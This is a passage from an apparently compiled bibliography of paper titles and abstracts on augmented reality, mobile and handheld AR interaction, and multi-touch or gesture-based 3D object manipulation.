in fields such as education, maintenance, design and reconnaissance, to name but a few. This paper describes the field of AR, including a brief definition and development history, the enabling technologies and their characteristics. It surveys the state of the art by reviewing some recent applications of AR technology as well as some known limitations regarding human factors in the use of AR systems that developers will need to overcome. --- paper_title: A TAXONOMY OF MIXED REALITY VISUAL DISPLAYS paper_content: Paul Milgram received the B.A.Sc. degree from the University of Toronto in 1970, the M.S.E.E. degree from the Technion (Israel) in 1973 and the Ph.D. degree from the University of Toronto in 1980. From 1980 to 1982 he was a ZWO Visiting Scientist and a NATO Postdoctoral in the Netherlands, researching automobile driving behaviour. From 1982 to 1984 he was a Senior Research Engineer in Human Engineering at the National Aerospace Laboratory (NLR) in Amsterdam, where his work involved the modelling of aircraft flight crew activity, advanced display concepts and control loops with human operators in space teleoperation. Since 1986 he has worked at the Industrial Engineering Department of the University of Toronto, where he is currently an Associate Professor and Coordinator of the Human Factors Engineering group. He is also cross appointed to the Department of Psychology. In 1993-94 he was an invited researcher at the ATR Communication Systems Research Laboratories, in Kyoto, Japan. 
His research interests include display and control issues in telerobotics and virtual environments, stereoscopic video and computer graphics, cognitive engineering, and human factors issues in medicine. He is also President of Translucent Technologies, a company which produces "Plato" liquid crystal visual occlusion spectacles (of which he is the inventor), for visual and psychomotor research. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: A REVIEW OF 3D GESTURE INTERACTION FOR HANDHELD AUGMENTED REALITY paper_content: Interaction for Handheld Augmented Reality (HAR) is a challenging research topic because of the small screen display and limited input options. Although 2D touch screen input is widely used, 3D gesture interaction is a suggested alternative input method. Recent 3D gesture interaction research mainly focuses on using RGB-Depth cameras to detect the spatial position and pose of fingers, using this data for virtual object manipulations in the AR scene. In this paper we review previous 3D gesture research on handheld interaction metaphors for HAR. We present their novelties as well as limitations, and discuss future research directions of 3D gesture interaction for HAR. Our results indicate that 3D gesture input on HAR is a potential interaction method for assisting a user in many tasks such as in education, urban simulation and 3D games. --- paper_title: Mobile Augmented Reality Survey: From Where We Are to Where We Go paper_content: The boom in the capabilities and features of mobile devices, like smartphones, tablets, and wearables, combined with the ubiquitous and affordable Internet access and the advances in the areas of cooperative networking, computer vision, and mobile cloud computing transformed mobile augmented reality (MAR) from science fiction to a reality. Although mobile devices are more constrained computationalwise from traditional computers, they have a multitude of sensors that can be used to the development of more sophisticated MAR applications and can be assisted from remote servers for the execution of their intensive parts. In this paper, after introducing the reader to the basics of MAR, we present a categorization of the application fields together with some representative examples. Next, we introduce the reader to the user interface and experience in MAR applications and continue with the core system components of the MAR systems. After that, we discuss advances in tracking and registration, since their functionality is crucial to any MAR application and the network connectivity of the devices that run MAR applications together with its importance to the performance of the application. 
We continue with the importance of data management in MAR systems and the systems performance and sustainability, and before we conclude this survey, we present existing challenging problems. --- paper_title: Perceptual issues in augmented reality revisited paper_content: This paper provides a classification of perceptual issues in augmented reality, created with a visual processing and interpretation pipeline in mind. We organize issues into ones related to the environment, capturing, augmentation, display, and individual user differences. We also illuminate issues associated with more recent platforms such as handhelds or projector-camera systems. Throughout, we describe current approaches to addressing these problems, and suggest directions for future research. --- paper_title: Augmented Reality in Surgery paper_content: Objective To evaluate the history and current knowledge of computer-augmented reality in the field of surgery and its potential goals in education, surgeon training, and patient treatment. Data Sources National Library of Medicine's database and additional library searches. Study Selection Only articles suited to surgical sciences with a well-defined aim of study, methodology, and precise description of outcome were included. Data Synthesis Augmented reality is an effective tool in executing surgical procedures requiring low-performance surgical dexterity; it remains a science determined mainly by stereotactic registration and ergonomics. Strong evidence was found that it is an effective teaching tool for training residents. Weaker evidence was found to suggest a significant influence on surgical outcome, both morbidity and mortality. No evidence of cost-effectiveness was found. Conclusions Augmented reality is a new approach in executing detailed surgical operations. Although its application is in a preliminary stage, further research is needed to evaluate its long-term clinical impact on patients, surgeons, and hospital administrators. Its widespread use and the universal transfer of such technology remains limited until there is a better understanding of registration and ergonomics. --- paper_title: 3D User Interfaces: Theory and Practice paper_content: Foreword. Preface. I. FOUNDATIONS OF 3D USER INTERFACES . 1. Introduction to 3D User Interfaces. What Are 3D User Interfaces? Why 3D User Interfaces? Terminology. Application Areas. Conclusion. 2. 3D User Interfaces: History and Roadmap. History of 3D UIs. Roadmap to 3D UIs. Scope of This Book. Conclusion. II. Hardware Technologies for 3D User Interfaces. 3. 3D User Interface Output Hardware. Introduction. Visual Displays. Auditory Displays. Haptic Displays. Design Guidelines: Choosing Output Devices for 3D User Interfaces. Conclusion. 4. 3D User Interface Input Hardware. Introduction. Desktop Input Devices. Tracking Devices. 3D Mice. Special-Purpose Input Devices. Direct Human Input. Home-Brewed Input Devices. Choosing Input Devices for 3D Interfaces. III. 3D INTERACTION TECHNIQUES. 5. Selection and Manipulation. Introduction. 3D Manipulation Tasks. Manipulation Techniques and Input Devices. Interaction Techniques for 3D Manipulation. Design Guidelines. 6. Travel. Introduction. 3D Travel Tasks. Travel Techniques. Design Guidelines. 7. Wayfinding. Introduction. Theoretical Foundations. User-Centered Wayfinding Support. Environment-Centered Wayfinding Support. Evaluating Wayfinding Aids. Design Guidelines. Conclusion. 8. System Control. Introduction. Classification. Graphical Menus. Voice Commands. Gestural Commands. 
Tools. Multimodal System Control Techniques. Design Guidelines. Case Study: Mixing System Control Methods. 8.10. Conclusion. 9. Symbolic Input. Introduction. Symbolic Input Tasks. Symbolic Input Techniques. Design Guidelines. Beyond Text and Number Entry. IV. DESIGNING AND DEVELOPING 3D USER INTERFACES. 10. Strategies for Designing and Developing 3D User Interfaces. Introduction. Designing for Humans. Inventing 3D User Interfaces. Design Guidelines. 11. Evaluation of 3D User Interfaces. Introduction. Background. Evaluation Metrics for 3D Interfaces. Distinctive Characteristics of 3D Interface Evaluation. Classification of 3D Evaluation Methods. Two Multimethod Approaches. Guidelines for 3D Interface Evaluation. V. THE FUTURE OF 3D USER INTERFACES. 12. Beyond Virtual: 3D User Interfaces for the Real World. Introduction. AR Interfaces as 3D Data Browsers. 3D Augmented Reality Interfaces. Augmented Surfaces and Tangible Interfaces. Tangible AR Interfaces. Agents in AR. Transitional AR-VR Interfaces. Conclusion. 13. The Future of 3D User Interfaces. Questions about 3D UI Technology. Questions about 3D Interaction Techniques. Questions about 3D UI Design and Development. Questions about 3D UI Evaluation. Million-Dollar Questions. Appendix A: Quick Reference Guide to 3D User Interface Mathematics. Scalars. Vectors. Points. Matrices. Quaternions. Bibliography. Index. --- paper_title: Recent Advances in Augmented Reality paper_content: In 1997, Azuma published a survey on augmented reality (AR). Our goal is to complement, rather than replace, the original survey by presenting representative examples of the new advances. We refer one to the original survey for descriptions of potential applications (such as medical visualization, maintenance and repair of complex equipment, annotation, and path planning); summaries of AR system characteristics (such as the advantages and disadvantages of optical and video approaches to blending virtual and real, problems in display focus and contrast, and system portability); and an introduction to the crucial problem of registration, including sources of registration error and error-reduction strategies. --- paper_title: Historical Oslo on a handheld device – a mobile augmented reality application paper_content: Abstract Mobile augmented reality (AR) applications can provide just-in-time information based on the user's preferences and context and thus improve the tourist experience. Due to various problems, the potential of this technology has yet to be fully exploited. In this paper, we present the design, implementation and evaluation of a mobile AR application for historical Oslo that aims to bring history to life by providing historical pictures of a location, depending on the direction in which the camera is pointing. This application can run offline and is designed as a generic framework where a similar application for a new city can be created by simply replacing the city-specific database. --- paper_title: Trends in augmented reality tracking, interaction and display: A review of ten years of ISMAR paper_content: Although Augmented Reality technology was first developed over forty years ago, there has been little survey work giving an overview of recent research in the field. This paper reviews the ten-year development of the work presented at the ISMAR conference and its predecessors with a particular focus on tracking, interaction and display research. 
It provides a roadmap for future augmented reality research, which will be of great value to this relatively young field, and also for helping researchers decide which topics should be explored when they are beginning their own studies in the area. --- paper_title: The MagicBook: a transitional AR interface paper_content: Abstract The MagicBook is a Mixed Reality interface that uses a real book to seamlessly transport users between Reality and Virtuality. A vision-based tracking method is used to overlay virtual models on real book pages, creating an Augmented Reality (AR) scene. When users see an AR scene they are interested in, they can fly inside it and experience it as an immersive Virtual Reality (VR). The interface also supports multi-scale collaboration, allowing multiple users to experience the same virtual environment either from an egocentric or an exocentric perspective. In this paper we describe the MagicBook prototype, potential applications and user feedback. --- paper_title: SlidAR: A 3D positioning method for SLAM-based handheld augmented reality paper_content: Abstract Handheld Augmented Reality (HAR) has the potential to introduce Augmented Reality (AR) to large audiences due to the widespread use of suitable handheld devices. However, many of the current HAR systems are not considered very practical and they do not fully answer the needs of the users. One of the challenging areas in HAR is in-situ AR content creation, where the correct and accurate positioning of virtual objects in the real world is fundamental. Due to the hardware limitations of handheld devices and possible restrictions in the environment, the correct 3D positioning of objects can be difficult to achieve when we are unable to use AR markers or correctly map the 3D structure of the environment. We present SlidAR, a 3D positioning method for Simultaneous Localization And Mapping (SLAM) based HAR systems. SlidAR utilizes 3D ray-casting and epipolar geometry for virtual object positioning. It does not require a perfect 3D reconstruction of the environment nor any virtual depth cues. We have conducted a user experiment to evaluate the efficiency of the SlidAR method against an existing device-centric positioning method that we call HoldAR. Results showed that SlidAR was significantly faster, required significantly less device movement, and also received significantly better subjective evaluations from the test participants. SlidAR also had higher positioning accuracy, although not significantly. --- paper_title: Professional Augmented Reality Browsers for Smartphones: Programming for junaio, Layar and Wikitude paper_content: Create amazing mobile augmented reality apps with junaio, Layar, and Wikitude! Professional Augmented Reality Browsers for Smartphones guides you through creating your own augmented reality apps for the iPhone, Android, Symbian, and bada platforms, featuring fully workable and downloadable source code.
You will learn important techniques through hands-on applications, and you will build on those skills as the book progresses. Professional Augmented Reality Browsers for Smartphones: describes how to use the latitude/longitude coordinate system to build location-aware solutions and tells where to get POIs for your own augmented reality applications; details the leading augmented reality platforms and highlights the best applications; covers development for the leading augmented reality browser platforms: Wikitude, Layar, and junaio; shows how to build cross-platform location-aware content (Android, iPhone, Symbian, and bada) to display POIs directly in camera view; and includes tutorials for building 2D and 3D content, storing content in databases, and triggering actions when users reach specific locations. --- paper_title: A study on improving close and distant device movement pose manipulation for hand-held augmented reality paper_content: Hand-held smart devices are equipped with powerful processing units, high resolution screens and cameras, which in combination make them suitable for video see-through Augmented Reality. Many Augmented Reality applications require interaction, such as selection and 3D pose manipulation. One way to perform intuitive, high precision 3D pose manipulation is by direct or indirect mapping of device movement. There are two approaches to device movement interaction; one fixes the virtual object to the device, which therefore becomes the pivot point for the object, thus making it difficult to rotate without translating. The second approach avoids the latter issue by considering rotation and translation separately, relative to the object's center point. The result of this is that the object instead moves out of view for yaw and pitch rotations. In this paper we study these two techniques and compare them with a modification where user perspective rendering is used to solve the rotation issues. The study showed that the modification improves speed as well as both perceived control and intuitiveness among the subjects. --- paper_title: Handheld Guides in Inspection Tasks: Augmented Reality versus Picture paper_content: Inspection tasks focus on observation of the environment and are required in many industrial domains. Inspectors usually execute these tasks by using a guide such as a paper manual, and directly observing the environment. The effort required to match the information in a guide with the information in an environment and the constant gaze shifts required between the two can severely lower the work efficiency of an inspector in performing his/her tasks.
Augmented reality (AR) allows the information in a guide to be overlaid directly on an environment. This can decrease the amount of effort required for information matching, thus increasing work efficiency. AR guides on head-mounted displays (HMDs) have been shown to increase efficiency. Handheld AR (HAR) is not as efficient as HMD-AR in terms of manipulability, but is more practical and features better information input and sharing capabilities. In this study, we compared two handheld guides: an AR interface that shows 3D registered annotations, that is, annotations having a fixed 3D position in the AR environment, and a non-AR picture interface that displays non-registered annotations on static images. We focused on inspection tasks that involve high information density and require the user to move, as well as to perform several viewpoint alignments. The results of our comparative evaluation showed that use of the AR interface resulted in lower task completion times, fewer errors, fewer gaze shifts, and a lower subjective workload. We are the first to present findings of a comparative study of an HAR and a picture interface when used in tasks that require the user to move and execute viewpoint alignments, focusing only on direct observation. Our findings can be useful for AR practitioners and psychology researchers. --- paper_title: A New You: From Augmented Reality to Augmented Human paper_content: Traditionally, the field of Human Computer Interaction (HCI) was primarily concerned with designing and investigating interfaces between humans and machines. The primary concern of Surface Computing is also still about designing better interfaces to information. However, with recent technological advances, the concept of "enhancing", "augmenting" or even "re-designing" humans themselves is becoming a very feasible and serious topic of scientific research as well as engineering development. "Augmented Human" is a term that I use to refer to this overall research direction. Augmented Human introduces a fundamental paradigm shift in HCI: from human-computer-interaction to human-computer-integration. In this talk, I will discuss rich possibilities and distinct challenges in enhancing human abilities. I will introduce recent projects conducted by our group including design and applications of wearable eye sensing for augmenting our perception and memory abilities, design of flying cameras as our external eyes, a home appliance that can increase your happiness, an organic physical wall/window that dynamically mediates the environment, and an immersive human-human communication called "JackIn". --- paper_title: Designing an augmented reality multimodal interface for 6dof manipulation techniques paper_content: Augmented Reality (AR) supports natural interaction in physical and virtual worlds, so it has recently given rise to a number of novel interaction modalities. This paper presents a method for using hand-gestures with speech input for multimodal interaction in AR. It focuses on providing an intuitive AR environment which supports natural interaction with virtual objects while sustaining accessible real tasks and interaction mechanisms. The paper reviews previous multimodal interfaces and describes recent studies in AR that employ gesture and speech inputs for multimodal input. It describes an implementation of gesture interaction with speech input in AR for virtual object manipulation. 
Finally, the paper presents a user evaluation of the technique, showing that it can be used to improve the interaction between virtual and physical elements in an AR environment. --- paper_title: Expected user experience of mobile augmented reality services: a user study in the context of shopping centres paper_content: The technical enablers for mobile augmented reality (MAR) are becoming robust enough to allow the development of MAR services that are truly valuable for consumers. Such services would provide a novel interface to the ubiquitous digital information in the physical world, hence serving in great variety of contexts and everyday human activities. To ensure the acceptance and success of future MAR services, their development should be based on knowledge about potential end users' expectations and requirements. We conducted 16 semi-structured interview sessions with 28 participants in shopping centres, which can be considered as a fruitful context for MAR services. We aimed to elicit new knowledge about (1) the characteristics of the expected user experience and (2) central user requirements related to MAR in such a context. From a pragmatic viewpoint, the participants expected MAR services to catalyse their sense of efficiency, empower them with novel context-sensitive and proactive functionalities and raise their awareness of the information related to their surroundings with an intuitive interface. Emotionally, MAR services were expected to offer stimulating and pleasant experiences, such as playfulness, inspiration, liveliness, collectivity and surprise. The user experience categories and user requirements that were identified can serve as targets for the design of user experience of future MAR services. --- paper_title: Application of Augmented Reality Techniques in Through-life Engineering Services paper_content: Abstract Augmented Reality (AR) is an innovative human-machine interaction that overlays virtual components on a real world environment with many potential applications in different fields, ranging from training activities to everyday life (entertainment, head-up display in car windscreens, etc.). The capability to provide the user of the needed information about a process or a procedure directly on the work environment, is the key factor for considering AR as an effective tool to be also used in Through-life Engineering Services (TES). Many experimental implementations have been made by industries and academic institutions in this research area: applications in remote maintenance, diagnostics, non-destructive testing, repairing and setup activities represent the most meaningful examples carried out in the last few years. These applications have concerned different working environments such as aerospace, railway, industrial plants, machine tools, military equipment, underground pipes, civil constructions, etc. The keynote paper will provide a comprehensive survey by reviewing some recent applications in these areas, emphasizing potential advantages, limits and drawbacks, as well as open issues which could represent new challenges for the future. --- paper_title: Rotation and translation mechanisms for tabletop interaction paper_content: A digital tabletop offers several advantages over other groupware form factors for collaborative applications. However, users of a tabletop system do not share a common perspective for the display of information: what is presented right side up to one participant is upside down for another. 
In this paper, we survey five different rotation and translation techniques for objects displayed on a direct touch digital tabletop display. We analyze their suitability for interactive tabletops in light of their respective input and output degrees of freedom, as well as the precision and completeness provided by each. We describe various tradeoffs that arise when considering which, when and where each of these techniques might be most useful. --- paper_title: Virtual reality and augmented reality as a training tool for assembly tasks paper_content: In this paper we investigate whether virtual reality (VR) and augmented reality (AR) offer potential for the training of manual skills, such as for assembly tasks, in comparison to conventional media. We present results from experiments that compare assembly completion times for a number of different conditions. We firstly investigate completion times for a task where participants can study an engineering drawing and an assembly plan and then conduct the task. We then investigate the task under various VR conditions and context-free AR. We discuss the relative advantages and limitations of using VR and AR as training media for investigating assembly operations, and we present the results of our experimental work. --- paper_title: Integrated view-input ar interaction for virtual object manipulation using tablets and smartphones paper_content: Lately, mobile augmented reality (AR) has become very popular and is used for many commercial and product promotional activities. However, in almost all mobile AR applications, the user only views annotated information or the preset motion of the virtual object in an AR environment and is unable to interact with the virtual objects as if he/she were interacting with real objects in the real environment. In this paper, in an attempt to realize enhanced intuitive and realistic object manipulation in the mobile AR environment, we propose an integrated view-input AR interaction method, which integrates user device manipulation and virtual object manipulation. The method enables the user to hold a 3D virtual object by touching the displayed object on the 2D touch screen of a mobile device, and to move and rotate the object by moving and rotating the mobile device while viewing the held object by way of the 2D screen of the mobile device. Based on this concept, we implemented three types of integrated methods, namely the Rod, Center, and Touch methods, and conducted a user study to investigate the baseline performance metrics of the proposed method on an AR object manipulation task. The Rod method achieved the highest success rate (91%). Participants' feedback indicated that this is because the Rod method is the most natural, and evoked a fixed mental model that is conceivable in the real environment. These results indicated that visualizing the manipulation point on the screen and restricting the user's interactivity with virtual objects from the user's position of view based on a conceivable mental model would be able to aid the user to achieve precise manipulation. --- paper_title: Advanced Interaction Techniques for Augmented Reality Applications paper_content: Augmented Reality (AR) research has been conducted for several decades, although until recently most AR applications had simple interaction methods using traditional input devices. AR tracking, display technology and software has progressed to the point where commercial applications can be developed. 
However there are opportunities to provide new advanced interaction techniques for AR applications. In this paper we describe several interaction methods that can be used to provide a better user experience, including tangible user interaction, multimodal input and mobile interaction. --- paper_title: Mobile markerless augmented reality and its application in forensic medicine paper_content: Purpose ::: During autopsy, forensic pathologists today mostly rely on visible indication, tactile perception and experience to determine the cause of death. Although computed tomography (CT) data is often available for the bodies under examination, these data are rarely used due to the lack of radiological workstations in the pathological suite. The data may prevent the forensic pathologist from damaging evidence by allowing him to associate, for example, external wounds to internal injuries. To facilitate this, we propose a new multimodal approach for intuitive visualization of forensic data and evaluate its feasibility. --- paper_title: A Survey of Augmented Reality paper_content: This paper surveys the field of augmented reality AR, in which 3D virtual objects are integrated into a 3D real environment in real time. It describes the medical, manufacturing, visualization, path planning, entertainment, and military applications that have been explored. This paper describes the characteristics of augmented reality systems, including a detailed discussion of the tradeoffs between optical and video blending approaches. Registration and sensing errors are two of the biggest problems in building effective augmented reality systems, so this paper summarizes current efforts to overcome these problems. Future directions and areas requiring further research are discussed. This survey provides a starting point for anyone interested in researching or using augmented reality. --- paper_title: A Novel Multi-touch Approach for 3D Object Free Manipulation paper_content: In the field of scientific visualization, 3D manipulation is a fundamental task for many different scientific datasets, such as particle data in physics and astronomy, fluid data in aerography, and structured data in medical science. Current researches show that large multi-touch interactive displays serve as a promising device providing numerous significant advantages for displaying and manipulating scientific data. Those benefits of direct-touch devices motivate us to use touch-based interaction techniques to explore scientific 3D data. However, manipulating object in 3D space via 2D touch input devices is challenging for precise control. Therefore, we present a novel multi-touch approach for manipulating structured objects in 3D visualization space, based on multi-touch gestures and an extra axis for the assistance. Our method supports 7-DOF manipulations. Moreover, with the help from the extra axis and depth hints, users can have better control of the interactions. We report on a user study to make comparisons between our method and standard mouse-based 2D interface. We show in this work that touch-based interactive displays can be more effective when applied to complex problems if the interactive visualizations and interactions are designed appropriately. --- paper_title: SmartSkin: an infrastructure for freehand manipulation on interactive surfaces paper_content: This paper introduces a new sensor architecture for making interactive surfaces that are sensitive to human hand and finger gestures. 
This sensor recognizes multiple hand positions and shapes and calculates the distance between the hand and the surface by using capacitive sensing and a mesh-shaped antenna. In contrast to camera-based gesture recognition systems, all sensing elements can be integrated within the surface, and this method does not suffer from lighting and occlusion problems. This paper describes the sensor architecture, as well as two working prototype systems: a table-size system and a tablet-size system. It also describes several interaction techniques that would be difficult to perform without using this architecture. --- paper_title: tBox: a 3d transformation widget designed for touch-screens paper_content: 3D transformation widgets are commonly used in many 3D applications operated from mice and keyboards. These user interfaces allow independent control of translations, rotations, and scaling for manipulation of 3D objects. In this paper, we study how these widgets can be adapted to the tactile paradigm. We have explored an approach where users apply rotations by means of physically plausible gestures, and we have extended successful 2D tactile principles to the context of 3D interaction. These investigations led to the design of a new 3D transformation widget, tBox, that can be operated easily and efficiently from gestures on touch-screens. --- paper_title: Rotation and translation mechanisms for tabletop interaction paper_content: A digital tabletop offers several advantages over other groupware form factors for collaborative applications. However, users of a tabletop system do not share a common perspective for the display of information: what is presented right side up to one participant is upside down for another. In this paper, we survey five different rotation and translation techniques for objects displayed on a direct touch digital tabletop display. We analyze their suitability for interactive tabletops in light of their respective input and output degrees of freedom, as well as the precision and completeness provided by each. We describe various tradeoffs that arise when considering which, when and where each of these techniques might be most useful. --- paper_title: The design and evaluation of 3D positioning techniques for multi-touch displays paper_content: Multi-touch displays represent a promising technology for the display and manipulation of 3D data. To fully exploit their capabilities, appropriate interaction techniques must be designed. In this paper, we explore the design of free 3D positioning techniques for multi-touch displays to exploit the additional degrees of freedom provided by this technology. Our contribution is two-fold: first we present an interaction technique to extend the standard four view-ports technique found in commercial CAD applications, and second we introduce a technique designed to allow free 3D positioning with a single view of the scene. The two techniques were evaluated in a preliminary experiment. The first results incline us to conclude that the two techniques are equivalent in terms of performance, showing that the Z-technique provides a real alternative to the status quo viewport technique. --- paper_title: A screen-space formulation for 2D and 3D direct manipulation paper_content: Rotate-Scale-Translate (RST) interactions have become the de facto standard when interacting with two-dimensional (2D) contexts in single-touch and multi-touch environments.
Because the use of RST has thus far focused almost entirely on 2D, there are not yet standard techniques for extending these principles into three dimensions. In this paper we describe a screen-space method which fully captures the semantics of the traditional 2D RST multi-touch interaction, but also allows us to extend these same principles into three-dimensional (3D) interaction. Just like RST allows users to directly manipulate 2D contexts with two or more points, our method allows the user to directly manipulate 3D objects with three or more points. We show some novel interactions, which take perspective into account and are thus not available in orthographic environments. Furthermore, we identify key ambiguities and unexpected behaviors that arise when performing direct manipulation in 3D and offer solutions to mitigate the difficulties each presents. Finally, we show how to extend our method to meet application-specific control objectives, as well as show our method working in some example environments. --- paper_title: Two-Finger Gestures for 6DOF Manipulation of 3D Objects paper_content: Multitouch input devices afford effective solutions for 6DOF (six Degrees of Freedom) manipulation of 3D objects. Mainly focusing on large-size multitouch screens, existing solutions typically require at least three fingers and bimanual interaction for full 6DOF manipulation. However, single-hand, two-finger operations are preferred especially for portable multitouch devices (e.g., popular smartphones) to cause less hand occlusion and relieve the other hand for necessary tasks like holding the devices. Our key idea for full 6DOF control using only two contact fingers is to introduce two manipulation modes and two corresponding gestures by examining the moving characteristics of the two fingers, instead of the number of fingers or the directness of individual fingers as done in previous works. We solve the resulting binary classification problem using a learning-based approach. Our pilot experiment shows that with only two contact fingers and typically unimanual interaction, our technique is comparable to or even better than the state-of-the-art techniques. --- paper_title: The structure of object transportation and orientation in human-computer interaction paper_content: An experiment was conducted to investigate the relationship between object transportation and object orientation by the human hand in the context of human-computer interaction (HCI). This work merges two streams of research: the structure of interactive manipulation in HCI and the natural hand prehension in human motor control. It was found that object transportation and object orientation have a parallel, interdependent structure which is generally persistent over different visual feedback conditions. The notion of concurrency and interdependence of multidimensional visuomotor control structure can provide a new framework for human-computer interface evaluation and design. --- paper_title: Integrality and Separability of Multitouch Interaction Techniques in 3D Manipulation Tasks paper_content: Multitouch displays represent a promising technology for the display and manipulation of data. While the manipulation of 2D data has been widely explored, 3D manipulation with multitouch displays remains largely unexplored. Based on an analysis of the integration and separation of degrees of freedom, we propose a taxonomy for 3D manipulation techniques with multitouch displays.
Using that taxonomy, we introduce Depth-Separated Screen-Space (DS3), a new 3D manipulation technique based on the separation of translation and rotation. In a controlled experiment, we compared DS3 with Sticky Tools and Screen-Space. Results show that separating the control of translation and rotation significantly affects performance for 3D manipulation, with DS3 performing faster than the two other techniques. --- paper_title: Sticky tools: full 6DOF force-based interaction for multi-touch tables paper_content: Tabletop computing techniques are using physically familiar force-based interactions to enable compelling interfaces that provide a feeling of being embodied with a virtual object. We introduce an interaction paradigm that has the benefits of force-based interaction complete with full 6DOF manipulation. Only multi-touch input, such as that provided by the Microsoft Surface and the SMART Table, is necessary to achieve this interaction freedom. This paradigm is realized through sticky tools: a combination of sticky fingers, a physically familiar technique for moving, spinning, and lifting virtual objects; opposable thumbs, a method for flipping objects over; and virtual tools, a method for propagating behaviour to other virtual objects in the scene. We show how sticky tools can introduce richer meaning to tabletop computing by drawing a parallel between sticky tools and the discussion in Urp [20] around the meaning of tangible devices in terms of nouns, verbs, reconfigurable tools, attributes, and pure objects. We then relate this discussion to other force-based interaction techniques by describing how a designer can introduce complexity in how people can control both physical and virtual objects, how physical objects can control both physical and virtual objects, and how virtual objects can control virtual objects. --- paper_title: Two-finger 3D rotations for novice users: surjective and integral interactions paper_content: Now that 3D interaction is available on tablets and smart phones, it becomes critical to provide efficient 3D interaction techniques for novice users. This paper investigates interaction techniques for 3D rotation with two fingers of a single hand, on multitouch mobile devices. We introduce two new rotation techniques that allow integral control of the 3 axes of rotation. These techniques also satisfy a new criterion that we introduce: surjection. We ran a study to compare the new techniques with two widely used rotation techniques from the literature. Results indicate that surjection and integration lead to a performance improvement of a group of participants who had no prior experience in 3D interaction. Qualitative results also indicate participants' preference for the new interaction techniques. --- paper_title: A one-handed multi-touch mating method for 3d rotations paper_content: Rotating 3D objects is a difficult task. We present a new rotation technique based on collision-free "mating" to expedite 3D rotations. It is specifically designed for one-handed interaction on tablets or touchscreens. A user study found that our new technique decreased the time to rotate objects in 3D by more than 60% in situations where objects align. We found similar results when users translated and rotated objects in a 3D scene. Also, angle errors were 35% less with mating. In essence, our new rotation technique improves both the speed and accuracy of common 3D rotation tasks. 
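The screen-space RST formulation and the two-finger 6DOF entries above all build on the same 2D primitive: given the previous and current positions of two touch points, recover the similarity transform (uniform scale, rotation, translation) that maps the old pair onto the new pair. The sketch below shows this standard two-point RST solve in Python; it is an illustrative reconstruction of that common mapping, not the exact solver of any cited paper, and the names RST and solve_rst are ours.

```python
import math
from dataclasses import dataclass


@dataclass
class RST:
    """2D similarity transform: uniform scale, rotation (radians), translation."""
    scale: float
    angle: float
    tx: float
    ty: float

    def apply(self, x: float, y: float) -> tuple:
        c, s = math.cos(self.angle), math.sin(self.angle)
        return (self.scale * (c * x - s * y) + self.tx,
                self.scale * (s * x + c * y) + self.ty)


def solve_rst(p0, p1, q0, q1) -> RST:
    """Similarity transform mapping start touches (p0, p1) onto current touches (q0, q1).

    Each argument is an (x, y) pixel position; p* are the finger positions when
    the gesture started, q* the positions in the current frame.
    """
    vpx, vpy = p1[0] - p0[0], p1[1] - p0[1]      # vector between the old touches
    vqx, vqy = q1[0] - q0[0], q1[1] - q0[1]      # vector between the new touches
    len_p, len_q = math.hypot(vpx, vpy), math.hypot(vqx, vqy)
    scale = len_q / len_p if len_p > 1e-9 else 1.0
    angle = math.atan2(vqy, vqx) - math.atan2(vpy, vpx)
    # Whatever offset remains after rotating and scaling p0 onto q0 is the translation.
    c, s = math.cos(angle), math.sin(angle)
    rx = scale * (c * p0[0] - s * p0[1])
    ry = scale * (s * p0[0] + c * p0[1])
    return RST(scale, angle, q0[0] - rx, q0[1] - ry)


if __name__ == "__main__":
    # Two fingers drift, twist and spread apart; the solved transform reproduces them.
    t = solve_rst((100, 100), (200, 100), (90, 120), (210, 160))
    print(t)
    print(t.apply(100, 100), t.apply(200, 100))   # ~(90, 120) and ~(210, 160)
```

The 3D screen-space formulation cited above generalizes this idea by constraining the screen-space projections of the grabbed 3D points to stay under the fingers, which in general requires an iterative solve rather than this closed form.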
--- paper_title: Markerless visual fingertip detection for natural mobile device interaction paper_content: The vision-based detection of hand gestures is one technological enabler for Natural User Interfaces which try to provide a natural and intuitive interaction with computers. In particular, mobile devices might benefit from such a less device-centric but more natural input possibility. In this paper, we introduce our ongoing work on the visual markerless detection of fingertips on mobile devices. Further, we shed light on the potential of mobile hand gesture detection and present several promising use cases and respective demo applications based on the presented engine. --- paper_title: PalmSpace: continuous around-device gestures vs. multitouch for 3D rotation tasks on mobile devices paper_content: Rotating 3D objects is a difficult task on mobile devices, because the task requires 3 degrees of freedom and (multi-)touch input only allows for an indirect mapping. We propose a novel style of mobile interaction based on mid-air gestures in proximity of the device to increase the number of DOFs and alleviate the limitations of touch interaction with mobile devices. While one hand holds the device, the other hand performs mid-air gestures in proximity of the device to control 3D objects on the mobile device's screen. A flat hand pose defines a virtual surface which we refer to as the PalmSpace for precise and intuitive 3D rotations. We constructed several hardware prototypes to test our interface and to simulate possible future mobile devices equipped with depth cameras. We conducted a user study to compare 3D rotation tasks using the most promising two designs for the hand location during interaction -- behind and beside the device -- with the virtual trackball, which is the current state-of-art technique for orientation manipulation on touch-screens. Our results show that both variants of PalmSpace have significantly lower task completion times in comparison to the virtual trackball. --- paper_title: Evaluating RGB+D hand posture detection methods for mobile 3D interaction paper_content: In mobile applications it is crucial to provide intuitive means for 2D and 3D interaction. A large number of techniques exist to support a natural user interface (NUI) by detecting the user's hand posture in RGB+D (depth) data. Depending on a given interaction scenario, each technique has its advantages and disadvantages. To evaluate the performance of the various techniques on a mobile device, we conducted a systematic study by comparing the accuracy of five common posture recognition approaches with varying illumination and background. To be able to perform this study, we developed a powerful software framework that is capable of processing and fusing RGB and depth data directly on a handheld device. Overall results reveal best recognition rate of posture detection for combined RGB+D data at the expense of update rate. Finally, to support users in choosing the appropriate technique for their specific mobile interaction task, we derived guidelines based on our study. --- paper_title: Visual gesture interfaces for virtual environments paper_content: Virtual environments provide a whole new way of viewing and manipulating 3D data. Current technology moves the images out of desktop monitors and into the space immediately surrounding the user. Users can literally put their hands on the virtual objects. Unfortunately techniques for interacting with such environments have yet to mature. 
